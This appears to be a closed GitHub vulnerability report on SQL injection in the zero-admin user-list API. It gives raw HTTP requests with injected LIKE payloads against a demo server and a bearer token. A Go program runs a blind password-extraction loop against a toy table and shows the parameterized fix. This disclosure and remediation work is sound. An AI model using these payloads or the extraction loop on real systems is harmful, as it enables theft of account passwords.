Closed L1nyz-tel closed 2 months ago
The route corresponding to this code is /api/sys/user/list:
https://github.com/feihua/zero-admin/blob/744dccf7c6bbe28ba78d429d85bbb1908edec746/rpc/model/sysmodel/sysusermodel.go#L61-L84
So boolean-based blind injection can be used to recover other accounts' plaintext passwords one character at a time.
It is known that the demo site's admin password is 123456; here is a simple check for the injection.
`sys_user.username like '%admin' AND sys_user.password like '124%'` - no match:

```http
POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 75
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '124"}
```
`sys_user.username like '%admin' AND sys_user.password like '123456%'` - match succeeds:

```http
POST http://110.41.179.89/api/sys/user/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 78
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/user/list/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":10,"name":"admin' AND sys_user.password like '123456"}
```
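As an added illustration of the report above (this is example code written for this page, not code from the zero-admin repository; the linked sysusermodel.go is not reproduced here), the Go program below emulates the reported pattern end to end: `buildVulnerableFilter` is an assumed minimal shape of the bug, where the JSON `name` field is concatenated into a LIKE clause; a toy in-memory `sys_user` table with constructed rows evaluates the resulting WHERE clause; `extractPassword` runs the boolean-blind loop from the report, using only "did the list come back empty" as its oracle; and `buildSafeFilter` shows the parameterized replacement with LIKE wildcard escaping. The sample rows, the `whereRe`/`likeMatch` evaluator and every function name are assumptions made for this example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed rows standing in for the sys_user table; not the project's data.
// Passwords are stored in plaintext, as the report's LIKE match implies.
type sysUser struct{ username, password string }

var demoUsers = []sysUser{
	{username: "admin", password: "123456"},
	{username: "guest", password: "guest"},
}

// buildVulnerableFilter is an assumed minimal shape of the bug the report
// describes: the JSON "name" field is concatenated straight into a LIKE
// clause, so a quote in it closes the string and the remainder is SQL.
func buildVulnerableFilter(name string) string {
	return "sys_user.username like '%" + name + "%'"
}

// whereRe is the whole grammar of the toy database: the intended single LIKE,
// optionally followed by the "AND ... LIKE" that the payload injects.
var whereRe = regexp.MustCompile(`^sys_user\.username like '([^']*)'(\s+AND sys_user\.password like '([^']*)')?$`)

// likeMatch implements the subset of SQL LIKE the payloads use: an optional %
// wildcard at either or both ends of the pattern.
func likeMatch(pattern, value string) bool {
	core := strings.Trim(pattern, "%")
	switch {
	case strings.HasPrefix(pattern, "%") && strings.HasSuffix(pattern, "%"):
		return strings.Contains(value, core)
	case strings.HasPrefix(pattern, "%"):
		return strings.HasSuffix(value, core)
	case strings.HasSuffix(pattern, "%"):
		return strings.HasPrefix(value, core)
	}
	return pattern == value
}

// vulnerableList emulates the /api/sys/user/list handler: build the WHERE
// clause by concatenation and let the toy database evaluate it. The attacker
// only sees whether the returned page is empty, which is the oracle.
func vulnerableList(name string) ([]sysUser, error) {
	where := buildVulnerableFilter(name)
	m := whereRe.FindStringSubmatch(where)
	if m == nil {
		return nil, fmt.Errorf("syntax error near: %s", where)
	}
	var rows []sysUser
	for _, u := range demoUsers {
		if likeMatch(m[1], u.username) && (m[2] == "" || likeMatch(m[3], u.password)) {
			rows = append(rows, u)
		}
	}
	return rows, nil
}

// extractPassword runs the boolean-based blind attack from the report: grow
// the known prefix one character at a time, keeping a candidate whenever the
// list comes back non-empty, and stop when nothing extends the prefix.
func extractPassword(username, charset string) string {
	prefix := ""
	for {
		extended := false
		for _, c := range charset {
			payload := fmt.Sprintf("%s' AND sys_user.password like '%s%c", username, prefix, c)
			if rows, err := vulnerableList(payload); err == nil && len(rows) > 0 {
				prefix += string(c)
				extended = true
				break
			}
		}
		if !extended {
			return prefix
		}
	}
}

// escapeLike makes a user-typed % or _ match literally. Assumes MySQL's
// default backslash escape character; other engines need an ESCAPE clause.
func escapeLike(s string) string {
	return strings.NewReplacer(`\`, `\\`, `%`, `\%`, `_`, `\_`).Replace(s)
}

// buildSafeFilter is the fix: the input travels as a bind parameter, never as
// SQL text, so the report's payload becomes a harmless literal search.
func buildSafeFilter(name string) (clause, arg string) {
	return "sys_user.username like ?", "%" + escapeLike(name) + "%"
}

func main() {
	fmt.Println("recovered admin password:", extractPassword("admin", "0123456789abcdefghijklmnopqrstuvwxyz"))
	clause, arg := buildSafeFilter("admin' AND sys_user.password like '124")
	fmt.Printf("safe query: %s  arg: %q\n", clause, arg)
}
```

Two points the run makes visible. The number of requests is linear in the password length times the charset size, so against a real deployment the loop in the report finishes in seconds, not hours. And the successful match on `'123456%'` also shows that the column holds the plaintext password: parameterizing the query stops the extraction, but hashing the stored password is the separate fix that bounds the damage if another query is ever injectable.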
Fixed.
SQL injection to obtain other accounts' passwords